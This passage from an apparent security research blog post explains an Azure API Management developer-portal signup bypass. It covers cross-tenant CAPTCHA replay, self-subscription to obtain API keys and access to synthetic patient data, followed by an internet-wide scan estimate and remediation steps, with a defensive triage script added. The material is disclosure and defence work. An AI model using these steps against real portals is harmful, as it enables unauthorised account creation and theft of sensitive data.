The toggle only hid the button.</p> <p><a id="step-3-create-a-cross-tenant-account."></a> </p></div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-1ca1c56 e-con-full e-flex e-con e-parent" data-id="1ca1c56" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-9a6e194 elementor-widget elementor-widget-heading" data-id="9a6e194" data-element_type="widget" data-e-type="widget" data-widget_type="heading.default"> <h4 class="elementor-heading-title elementor-size-default">Step 3: Create a cross-tenant account.</h4> </div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-bc35f9d e-con-full e-flex e-con e-parent" data-id="bc35f9d" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-fa4a867 elementor-widget elementor-widget-text-editor" data-id="fa4a867" data-element_type="widget" data-e-type="widget" data-widget_type="text-editor.default"> <p>The attacker generates and solves a CAPTCHA on their own APIM instance, then replays the solution against the target:</p> </div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-b9bd2d3 e-con-full e-flex e-con e-parent" data-id="b9bd2d3" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-b3248f1 elementor-widget elementor-widget-image" data-id="b3248f1" data-element_type="widget" data-e-type="widget" data-widget_type="image.default"> <figure class="wp-caption"> <img loading="lazy" decoding="async" width="500" height="436" src="https://www.praetorian.com/wp-content/uploads/2026/03/http-post-request-to-signup-endpoint-with-json-payload-conta-1.webp" class="attachment-full size-full wp-image-10953" alt="HTTP POST request to signup endpoint with JSON payload containing 
CAPTCHA challenge data and user registration details" srcset="https://www.praetorian.com/wp-content/uploads/2026/03/http-post-request-to-signup-endpoint-with-json-payload-conta-1.webp 500w, https://www.praetorian.com/wp-content/uploads/2026/03/http-post-request-to-signup-endpoint-with-json-payload-conta-1-300x262.webp 300w" sizes="auto, (max-width: 500px) 100vw, 500px"><figcaption class="widget-image-caption wp-caption-text">Cross-tenant signup POST request with attacker credentials and replayed CAPTCHA</figcaption></figure> </div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-b54db11 e-con-full e-flex e-con e-parent" data-id="b54db11" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-ae3b262 elementor-widget elementor-widget-image" data-id="ae3b262" data-element_type="widget" data-e-type="widget" data-widget_type="image.default"> <figure class="wp-caption"> <img loading="lazy" decoding="async" width="420" height="176" src="https://www.praetorian.com/wp-content/uploads/2026/03/http-response-showing-status-200-ok-content-type-application-1.webp" class="attachment-full size-full wp-image-10954" alt="HTTP response showing status 200 OK, Content-Type application/json header, and response body containing the string OK" srcset="https://www.praetorian.com/wp-content/uploads/2026/03/http-response-showing-status-200-ok-content-type-application-1.webp 420w, https://www.praetorian.com/wp-content/uploads/2026/03/http-response-showing-status-200-ok-content-type-application-1-300x126.webp 300w" sizes="auto, (max-width: 420px) 100vw, 420px"><figcaption class="widget-image-caption wp-caption-text">HTTP 200 OK response confirming account creation</figcaption></figure> </div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-9184338 e-con-full e-flex e-con e-parent" data-id="9184338" 
data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-c079ed7 elementor-widget elementor-widget-image" data-id="c079ed7" data-element_type="widget" data-e-type="widget" data-widget_type="image.default"> <figure class="wp-caption"> <img loading="lazy" decoding="async" width="1316" height="488" src="https://www.praetorian.com/wp-content/uploads/2026/03/email-from-researchpraetoriancom-asking-user-to-confirm-new-1-1.webp" class="attachment-full size-full wp-image-10955" alt="Email from [email protected] asking user to confirm new API account by clicking a suspicious link with long parameters" srcset="https://www.praetorian.com/wp-content/uploads/2026/03/email-from-researchpraetoriancom-asking-user-to-confirm-new-1-1.webp 1316w, https://www.praetorian.com/wp-content/uploads/2026/03/email-from-researchpraetoriancom-asking-user-to-confirm-new-1-1-300x111.webp 300w, https://www.praetorian.com/wp-content/uploads/2026/03/email-from-researchpraetoriancom-asking-user-to-confirm-new-1-1-1024x380.webp 1024w, https://www.praetorian.com/wp-content/uploads/2026/03/email-from-researchpraetoriancom-asking-user-to-confirm-new-1-1-768x285.webp 768w" sizes="auto, (max-width: 1316px) 100vw, 1316px"><figcaption class="widget-image-caption wp-caption-text">Email invitation after successful self-sign-up</figcaption></figure> </div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-0b8f379 e-con-full e-flex e-con e-parent" data-id="0b8f379" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-49ca69a elementor-widget elementor-widget-text-editor" data-id="49ca69a" data-element_type="widget" data-e-type="widget" data-widget_type="text-editor.default"> <p>The backend accepts the replayed CAPTCHA solution without checking which APIM instance issued the challenge. The account is created in the target’s APIM instance, the attacker receives the confirmation email, and can now log in.</p> <p><a id="Xadf1d2eff9fa4ebf9c1108a4310cd6aad77b8f3"></a> </p></div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-189e3a5 e-con-full e-flex e-con e-parent" data-id="189e3a5" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-2da9547 elementor-widget elementor-widget-heading" data-id="2da9547" data-element_type="widget" data-e-type="widget" data-widget_type="heading.default"> <h4 class="elementor-heading-title elementor-size-default">Step 4: Authenticate, subscribe to a product, and obtain an API key.</h4> </div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-5cdc911 e-con-full e-flex e-con e-parent" data-id="5cdc911" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-8c6fd2b elementor-widget elementor-widget-text-editor" data-id="8c6fd2b" data-element_type="widget" data-e-type="widget" data-widget_type="text-editor.default"> <p>The default Starter product ships with approvalRequired: false. The attacker self-subscribes using a PUT request to the management API. 
No administrator approval is needed:</p> </div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-a3ba61d e-con-full e-flex e-con e-parent" data-id="a3ba61d" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-001045d elementor-widget elementor-widget-image" data-id="001045d" data-element_type="widget" data-e-type="widget" data-widget_type="image.default"> <figure class="wp-caption"> <img loading="lazy" decoding="async" width="960" height="304" src="https://www.praetorian.com/wp-content/uploads/2026/03/terminal-showing-curl-command-making-api-call-to-azure-manag-1.webp" class="attachment-full size-full wp-image-10956" alt="Terminal showing curl command making API call to Azure Management API with Basic authentication, returning HTTP 200 response with JSON ID" srcset="https://www.praetorian.com/wp-content/uploads/2026/03/terminal-showing-curl-command-making-api-call-to-azure-manag-1.webp 960w, https://www.praetorian.com/wp-content/uploads/2026/03/terminal-showing-curl-command-making-api-call-to-azure-manag-1-300x95.webp 300w, https://www.praetorian.com/wp-content/uploads/2026/03/terminal-showing-curl-command-making-api-call-to-azure-manag-1-768x243.webp 768w" sizes="auto, (max-width: 960px) 100vw, 960px"><figcaption class="widget-image-caption wp-caption-text">Attacker can authenticate as a Developer to the APIM developer portal</figcaption></figure> </div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-c7ad55d e-con-full e-flex e-con e-parent" data-id="c7ad55d" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-fdd9af9 elementor-widget elementor-widget-image" data-id="fdd9af9" data-element_type="widget" data-e-type="widget" data-widget_type="image.default"> <figure class="wp-caption"> <img loading="lazy" 
decoding="async" width="960" height="324" src="https://www.praetorian.com/wp-content/uploads/2026/03/terminal-window-showing-curl-command-creating-azure-subscrip-1.webp" class="attachment-full size-full wp-image-10957" alt="Terminal window showing curl command creating Azure subscription with PUT request, displaying HTTP 201 response with JSON data" srcset="https://www.praetorian.com/wp-content/uploads/2026/03/terminal-window-showing-curl-command-creating-azure-subscrip-1.webp 960w, https://www.praetorian.com/wp-content/uploads/2026/03/terminal-window-showing-curl-command-creating-azure-subscrip-1-300x101.webp 300w, https://www.praetorian.com/wp-content/uploads/2026/03/terminal-window-showing-curl-command-creating-azure-subscrip-1-768x259.webp 768w" sizes="auto, (max-width: 960px) 100vw, 960px"><figcaption class="widget-image-caption wp-caption-text">Self-subscribe PUT request to Starter product returns 201 Created</figcaption></figure> </div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-e719eab e-con-full e-flex e-con e-parent" data-id="e719eab" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-37ec580 elementor-widget elementor-widget-image" data-id="37ec580" data-element_type="widget" data-e-type="widget" data-widget_type="image.default"> <figure class="wp-caption"> <img loading="lazy" decoding="async" width="960" height="344" src="https://www.praetorian.com/wp-content/uploads/2026/03/terminal-window-showing-curl-command-to-azure-api-with-http-1-1.webp" class="attachment-full size-full wp-image-10958" alt="Terminal window showing curl command to Azure API with HTTP 200 response containing primaryKey and secondaryKey JSON values" srcset="https://www.praetorian.com/wp-content/uploads/2026/03/terminal-window-showing-curl-command-to-azure-api-with-http-1-1.webp 960w, 
https://www.praetorian.com/wp-content/uploads/2026/03/terminal-window-showing-curl-command-to-azure-api-with-http-1-1-300x108.webp 300w, https://www.praetorian.com/wp-content/uploads/2026/03/terminal-window-showing-curl-command-to-azure-api-with-http-1-1-768x275.webp 768w" sizes="auto, (max-width: 960px) 100vw, 960px"><figcaption class="widget-image-caption wp-caption-text">listSecrets response containing primary and secondary API keys</figcaption></figure> </div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-9f9154a e-con-full e-flex e-con e-parent" data-id="9f9154a" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-7e3c937 elementor-widget elementor-widget-image" data-id="7e3c937" data-element_type="widget" data-e-type="widget" data-widget_type="image.default"> <figure class="wp-caption"> <img loading="lazy" decoding="async" width="1332" height="621" src="https://www.praetorian.com/wp-content/uploads/2026/03/email-from-praetorian-research-welcoming-elgin-lee-to-starte-1.webp" class="attachment-full size-full wp-image-10959" alt="Email from Praetorian Research welcoming Elgin Lee to Starter subscription, showing start date 3/13/2026 and API usage details" srcset="https://www.praetorian.com/wp-content/uploads/2026/03/email-from-praetorian-research-welcoming-elgin-lee-to-starte-1.webp 1332w, https://www.praetorian.com/wp-content/uploads/2026/03/email-from-praetorian-research-welcoming-elgin-lee-to-starte-1-300x140.webp 300w, https://www.praetorian.com/wp-content/uploads/2026/03/email-from-praetorian-research-welcoming-elgin-lee-to-starte-1-1024x477.webp 1024w, https://www.praetorian.com/wp-content/uploads/2026/03/email-from-praetorian-research-welcoming-elgin-lee-to-starte-1-768x358.webp 768w" sizes="auto, (max-width: 1332px) 100vw, 1332px"><figcaption class="widget-image-caption wp-caption-text">Confirmation email of a successful 
subscription to Starter</figcaption></figure> </div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-158a6cb e-con-full e-flex e-con e-parent" data-id="158a6cb" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-4a1c780 elementor-widget elementor-widget-heading" data-id="4a1c780" data-element_type="widget" data-e-type="widget" data-widget_type="heading.default"> <h4 class="elementor-heading-title elementor-size-default">Step 5: Call backend APIs.</h4> </div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-0df09b6 e-con-full e-flex e-con e-parent" data-id="0df09b6" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-0186939 elementor-widget elementor-widget-text-editor" data-id="0186939" data-element_type="widget" data-e-type="widget" data-widget_type="text-editor.default"> <p>With a valid subscription key, the attacker makes authenticated API calls through the APIM gateway:</p> </div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-eb3b039 e-con-full e-flex e-con e-parent" data-id="eb3b039" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-ae5d147 elementor-widget elementor-widget-image" data-id="ae5d147" data-element_type="widget" data-e-type="widget" data-widget_type="image.default"> <figure class="wp-caption"> <img loading="lazy" decoding="async" width="960" height="304" src="https://www.praetorian.com/wp-content/uploads/2026/03/terminal-window-showing-curl-command-to-medical-device-api-r-1.webp" class="attachment-full size-full wp-image-10960" alt="Terminal window showing curl command to medical device API returning HTTP 200 response with JSON data showing total patient count of 12847" 
srcset="https://www.praetorian.com/wp-content/uploads/2026/03/terminal-window-showing-curl-command-to-medical-device-api-r-1.webp 960w, https://www.praetorian.com/wp-content/uploads/2026/03/terminal-window-showing-curl-command-to-medical-device-api-r-1-300x95.webp 300w, https://www.praetorian.com/wp-content/uploads/2026/03/terminal-window-showing-curl-command-to-medical-device-api-r-1-768x243.webp 768w" sizes="auto, (max-width: 960px) 100vw, 960px"><figcaption class="widget-image-caption wp-caption-text">Patient count API returns 12,847 records accessible</figcaption></figure> </div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-5b0bd8c e-con-full e-flex e-con e-parent" data-id="5b0bd8c" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-efe2d1c elementor-widget elementor-widget-image" data-id="efe2d1c" data-element_type="widget" data-e-type="widget" data-widget_type="image.default"> <figure class="wp-caption"> <img loading="lazy" decoding="async" width="960" height="1224" src="https://www.praetorian.com/wp-content/uploads/2026/03/terminal-window-showing-json-response-from-medical-api-with-1-1.webp" class="attachment-full size-full wp-image-10961" alt="Terminal window showing JSON response from medical API with patient records including names, diagnoses, and physician details" srcset="https://www.praetorian.com/wp-content/uploads/2026/03/terminal-window-showing-json-response-from-medical-api-with-1-1.webp 960w, https://www.praetorian.com/wp-content/uploads/2026/03/terminal-window-showing-json-response-from-medical-api-with-1-1-235x300.webp 235w, https://www.praetorian.com/wp-content/uploads/2026/03/terminal-window-showing-json-response-from-medical-api-with-1-1-803x1024.webp 803w, https://www.praetorian.com/wp-content/uploads/2026/03/terminal-window-showing-json-response-from-medical-api-with-1-1-768x979.webp 768w" sizes="auto, (max-width: 
960px) 100vw, 960px"><figcaption class="widget-image-caption wp-caption-text">Patient search returns full records with MRNs, names, DOBs, diagnoses, and insurance IDs. All data shown above is entirely synthetic, generated by a mock API we built for research.</figcaption></figure> </div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-0881ea2 e-con-full e-flex e-con e-parent" data-id="0881ea2" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-52e168d elementor-widget elementor-widget-text-editor" data-id="52e168d" data-element_type="widget" data-e-type="widget" data-widget_type="text-editor.default"> <p>From anonymous internet access to patient health records and IoT device authentication tokens. 
Five steps, no credentials, no prior access to the target organization.</p> <p><a id="X3b0c89f01e5f0b95d7d85b6baf4140534fa4076"></a> </p></div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-196f374 e-con-full e-flex e-con e-parent" data-id="196f374" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-28773d4 elementor-widget elementor-widget-heading" data-id="28773d4" data-element_type="widget" data-e-type="widget" data-widget_type="heading.default"> <h2 class="elementor-heading-title elementor-size-default">Impact Spectrum: From Noise to Critical Data Exposure</h2> </div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-a0ecf3b e-con-full e-flex e-con e-parent" data-id="a0ecf3b" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-bd4c3aa elementor-widget elementor-widget-text-editor" data-id="bd4c3aa" data-element_type="widget" data-e-type="widget" data-widget_type="text-editor.default"> <p>Not every exploitable instance carries the same risk. The Azure APIM signup bypass is the common entry point, but the severity depends on what the organization has placed behind its Developer Portal. 
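</p>
<p>To triage that exposure on an instance you administer, the following script (an added example, not code from the Praetorian post) reads APIM product definitions in the shape the Azure Resource Manager Product contract returns and reports which products hand a self-registered developer a key without any administrator action, which is the Step 4 path above. It accepts both the nested properties object of the raw REST response and the flattened objects the Azure CLI (az apim product list) is assumed to emit. The four tiers are this example’s own reading of the post, not Praetorian’s decision tree; the sample products are constructed to mirror the default Starter (no approval) and Unlimited (approval required) products plus two hypothetical ones, and the script ignores group visibility, which can further restrict who sees a product.</p>

```python
# Added example (not from the Praetorian post): flag APIM products that let a
# self-registered developer obtain a subscription key with no admin approval,
# i.e. the Step 4 path. Input shape follows the ARM Product contract
# (properties.state / subscriptionRequired / approvalRequired); flat dicts as
# assumed from `az apim product list` are accepted too. Tier names are this
# example's own; group visibility is deliberately ignored.
import json

SELF_SERVICE = "SELF-SERVICE"      # published, key required, no approval: rogue signup -> key
APPROVAL_GATED = "APPROVAL-GATED"  # an admin must approve, so a rogue signup lands in the queue
OPEN = "OPEN"                      # no key needed at all; the signup bypass is irrelevant here
HIDDEN = "HIDDEN"                  # not published; not offered in the portal

_ORDER = {SELF_SERVICE: 3, OPEN: 2, APPROVAL_GATED: 1, HIDDEN: 0}


def triage_product(product: dict) -> tuple:
    """Return (product name, tier) for one ARM-style or flat product object."""
    props = product.get("properties", product)          # nested ARM shape or flat dict
    name = product.get("name") or props.get("displayName", "?")
    if props.get("state", "published") != "published":
        return name, HIDDEN
    if not props.get("subscriptionRequired", True):     # APIs callable with no key
        return name, OPEN
    if not props.get("approvalRequired", False):        # ARM default is false
        return name, SELF_SERVICE
    return name, APPROVAL_GATED


def triage(products: list) -> list:
    """Triage every product, worst first."""
    return sorted((triage_product(p) for p in products), key=lambda r: -_ORDER[r[1]])


def self_service_products(products: list) -> list:
    """Names of products an anonymous self-signup can turn into a live key."""
    return [name for name, tier in triage(products) if tier == SELF_SERVICE]


# Constructed sample mirroring APIM's default Starter/Unlimited products plus
# two made-up ones; not output from a real instance.
SAMPLE_PRODUCTS = json.loads("""[
  {"name": "starter",   "properties": {"displayName": "Starter",   "state": "published",
     "subscriptionRequired": true,  "approvalRequired": false}},
  {"name": "unlimited", "properties": {"displayName": "Unlimited", "state": "published",
     "subscriptionRequired": true,  "approvalRequired": true}},
  {"name": "telemetry", "properties": {"displayName": "Telemetry", "state": "published",
     "subscriptionRequired": false, "approvalRequired": false}},
  {"name": "legacy-v1", "properties": {"displayName": "Legacy v1", "state": "notPublished",
     "subscriptionRequired": true,  "approvalRequired": false}}
]""")


if __name__ == "__main__":
    for name, tier in triage(SAMPLE_PRODUCTS):
        print(f"{tier:<15} {name}")
    print("self-service:", self_service_products(SAMPLE_PRODUCTS))
```

<p>Anything reported as SELF-SERVICE deserves the same treatment as an open signup: either require approval on the product or, as the post recommends, remove the Basic Auth identity provider so the signup endpoint itself answers 404.</p>
<p>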
We configured three tiers of APIM instances to illustrate the range.</p> <p><a id="the-exploitability-matrix"></a> </p></div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-4e77759 e-con-full e-flex e-con e-parent" data-id="4e77759" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-5ec516e elementor-widget elementor-widget-heading" data-id="5ec516e" data-element_type="widget" data-e-type="widget" data-widget_type="heading.default"> <h3 class="elementor-heading-title elementor-size-default">The Exploitability Matrix</h3> </div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-0880218 e-con-full e-flex e-con e-parent" data-id="0880218" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-a550547 elementor-widget elementor-widget-text-editor" data-id="a550547" data-element_type="widget" data-e-type="widget" data-widget_type="text-editor.default"> </div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-4c7cf49 e-con-full e-flex e-con e-parent" data-id="4c7cf49" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-8cdd448 elementor-widget elementor-widget-image" data-id="8cdd448" data-element_type="widget" data-e-type="widget" data-widget_type="image.default"> <figure class="wp-caption"> <img loading="lazy" decoding="async" width="1768" height="1254" src="https://www.praetorian.com/wp-content/uploads/2026/03/flowchart-showing-security-risk-paths-from-cross-tenant-sign-1.webp" class="attachment-full size-full wp-image-10962" alt="Flowchart showing security risk paths from cross-tenant signup through subscription decisions to final risk outcomes" 
srcset="https://www.praetorian.com/wp-content/uploads/2026/03/flowchart-showing-security-risk-paths-from-cross-tenant-sign-1.webp 1768w, https://www.praetorian.com/wp-content/uploads/2026/03/flowchart-showing-security-risk-paths-from-cross-tenant-sign-1-300x213.webp 300w, https://www.praetorian.com/wp-content/uploads/2026/03/flowchart-showing-security-risk-paths-from-cross-tenant-sign-1-1024x726.webp 1024w, https://www.praetorian.com/wp-content/uploads/2026/03/flowchart-showing-security-risk-paths-from-cross-tenant-sign-1-768x545.webp 768w, https://www.praetorian.com/wp-content/uploads/2026/03/flowchart-showing-security-risk-paths-from-cross-tenant-sign-1-1536x1089.webp 1536w" sizes="auto, (max-width: 1768px) 100vw, 1768px"><figcaption class="widget-image-caption wp-caption-text">Exploitability decision tree showing impact tiers based on product configuration</figcaption></figure> </div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-b7518ed e-con-full e-flex e-con e-parent" data-id="b7518ed" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-271b93e elementor-widget elementor-widget-heading" data-id="271b93e" data-element_type="widget" data-e-type="widget" data-widget_type="heading.default"> <h2 class="elementor-heading-title elementor-size-default">At Scale: 25,000+ Developer Portals Exposed</h2> </div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-aadbc6f e-con-full e-flex e-con e-parent" data-id="aadbc6f" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-b31aeb1 elementor-widget elementor-widget-text-editor" data-id="b31aeb1" data-element_type="widget" data-e-type="widget" data-widget_type="text-editor.default"> <p>The original advisory demonstrated the vulnerability against individual instances. 
We assessed the scope: how many Azure APIM Developer Portals are internet-facing, and how many are likely vulnerable?</p> <p><a id="methodology"></a> </p></div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-cee4eb4 e-con-full e-flex e-con e-parent" data-id="cee4eb4" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-5185086 elementor-widget elementor-widget-heading" data-id="5185086" data-element_type="widget" data-e-type="widget" data-widget_type="heading.default"> <h3 class="elementor-heading-title elementor-size-default">Methodology</h3> </div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-30f55b3 e-con-full e-flex e-con e-parent" data-id="30f55b3" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-9575057 elementor-widget elementor-widget-text-editor" data-id="9575057" data-element_type="widget" data-e-type="widget" data-widget_type="text-editor.default"> <p>We queried Shodan for all hosts matching hostname:developer.azure-api.net, which returned <strong>69,248 matching banners</strong> for individual port/service observations across internet-facing APIM infrastructure. After deduplication, we identified <strong>25,379 unique APIM Developer Portal instances</strong>. We used this as our sample set for heuristic analysis.</p> <p><strong>Limitation:</strong> This search only identifies portals using the default *.developer.azure-api.net hostname. Organizations that configure custom domains (e.g., developers.contoso.com with a CNAME to Azure APIM) are not captured. 
Azure uses a single wildcard TLS certificate for all APIM portals, so Certificate Transparency logs do not reveal individual instance names.</p> <p><a id="X41aea7440729aec4e61385a47baf1e16fde56eb"></a> </p></div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-9ac8b5e e-con-full e-flex e-con e-parent" data-id="9ac8b5e" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-4a7698e elementor-widget elementor-widget-heading" data-id="4a7698e" data-element_type="widget" data-e-type="widget" data-widget_type="heading.default"> <h3 class="elementor-heading-title elementor-size-default">Heuristic Analysis: Estimating Vulnerability at Scale</h3> </div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-f694220 e-con-full e-flex e-con e-parent" data-id="f694220" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-4ecae6c elementor-widget elementor-widget-text-editor" data-id="4ecae6c" data-element_type="widget" data-e-type="widget" data-widget_type="text-editor.default"> <p>We designed a non-invasive heuristic probe to classify instances without triggering any signup flow or creating any accounts on third-party infrastructure.</p> <p>Our approach: send a POST /signup request with an empty JSON body ({}), no email, password, CAPTCHA, or PII, to every instance. This request cannot create an account and does not complete any step of the signup flow. The probe classifies responses based on error message content: an HTTP 400 containing “ValidationError,” “captcha,” or “challenge” indicates the signup endpoint is active and consistent with an enabled Basic Auth provider; an HTTP 404 indicates the signup endpoint does not exist. 
These are heuristic-based estimates, not confirmed exploits.</p> <p>Even accounting for the margin of error, <strong>the vast majority of internet-facing APIM Developer Portals, on the order of 23,000 to 25,000 instances, show responses consistent with an active Basic Auth signup endpoint.</strong> Only 51 instances returned HTTP 404 on /signup, indicating the Basic Auth provider has been explicitly removed.</p> <p><a id="what-this-means"></a> </p></div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-234047d e-con-full e-flex e-con e-parent" data-id="234047d" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-87f8e55 elementor-widget elementor-widget-heading" data-id="87f8e55" data-element_type="widget" data-e-type="widget" data-widget_type="heading.default"> <h3 class="elementor-heading-title elementor-size-default">What This Means</h3> </div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-6ba5a4e e-con-full e-flex e-con e-parent" data-id="6ba5a4e" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-1e94cea elementor-widget elementor-widget-text-editor" data-id="1e94cea" data-element_type="widget" data-e-type="widget" data-widget_type="text-editor.default"> <p>Four months after Haatainen’s public disclosure, the data suggests that very few organizations have taken the remediation step of removing the Basic Auth provider. Because MSRC classified this as “by design,” there was no security advisory or automated patch to drive remediation. 
Organizations that use the “disable signup” toggle as their primary control may not realize that the Azure APIM signup bypass remains exploitable and that additional action is required.</p> <p><a id="remediation-closing-the-gap"></a> </p></div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-52536c2 e-con-full e-flex e-con e-parent" data-id="52536c2" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-e870a2a elementor-widget elementor-widget-heading" data-id="e870a2a" data-element_type="widget" data-e-type="widget" data-widget_type="heading.default"> <h2 class="elementor-heading-title elementor-size-default">Remediation: Closing the Gap</h2> </div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-64645fb e-con-full e-flex e-con e-parent" data-id="64645fb" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-fd6ecc4 elementor-widget elementor-widget-text-editor" data-id="fd6ecc4" data-element_type="widget" data-e-type="widget" data-widget_type="text-editor.default"> <p>Because MSRC has classified this behavior as “by design,” no patch or automated fix is forthcoming. Organizations running APIM need to take explicit action to close the signup endpoint. 
The fix is straightforward, but the Azure Portal’s “disable signup” toggle alone is not sufficient.</p> <p><a id="X56a8c51815d2afc6c4c811ac051689e6daa59df"></a> </p></div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-b00aaf8 e-con-full e-flex e-con e-parent" data-id="b00aaf8" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-737a970 elementor-widget elementor-widget-heading" data-id="737a970" data-element_type="widget" data-e-type="widget" data-widget_type="heading.default"> <h3 class="elementor-heading-title elementor-size-default">1. Delete the Basic Authentication identity provider entirely.</h3> </div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-073b3c5 e-con-full e-flex e-con e-parent" data-id="073b3c5" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-638726d elementor-widget elementor-widget-text-editor" data-id="638726d" data-element_type="widget" data-e-type="widget" data-widget_type="text-editor.default"> <p>This is the only remediation that fully eliminates the attack surface. 
Removing the Basic Auth provider deactivates the /signup endpoint; there is no registration mechanism left for the attacker to target.</p> </div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-d8ef701 e-con-full e-flex e-con e-parent" data-id="d8ef701" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-3be925b elementor-widget elementor-widget-image" data-id="3be925b" data-element_type="widget" data-e-type="widget" data-widget_type="image.default"> <img loading="lazy" decoding="async" width="960" height="164" src="https://www.praetorian.com/wp-content/uploads/2026/03/terminal-window-showing-azure-cli-command-to-delete-basic-au-1.webp" class="attachment-full size-full wp-image-10963" alt="Terminal window showing Azure CLI command to delete Basic Auth Provider from API Management service with subscription and resource group parameters" srcset="https://www.praetorian.com/wp-content/uploads/2026/03/terminal-window-showing-azure-cli-command-to-delete-basic-au-1.webp 960w, https://www.praetorian.com/wp-content/uploads/2026/03/terminal-window-showing-azure-cli-command-to-delete-basic-au-1-300x51.webp 300w, https://www.praetorian.com/wp-content/uploads/2026/03/terminal-window-showing-azure-cli-command-to-delete-basic-au-1-768x131.webp 768w" sizes="auto, (max-width: 960px) 100vw, 960px"> </div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-79a7fbe e-con-full e-flex e-con e-parent" data-id="79a7fbe" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-2e121e6 elementor-widget elementor-widget-heading" data-id="2e121e6" data-element_type="widget" data-e-type="widget" data-widget_type="heading.default"> <h3 class="elementor-heading-title elementor-size-default">2. 
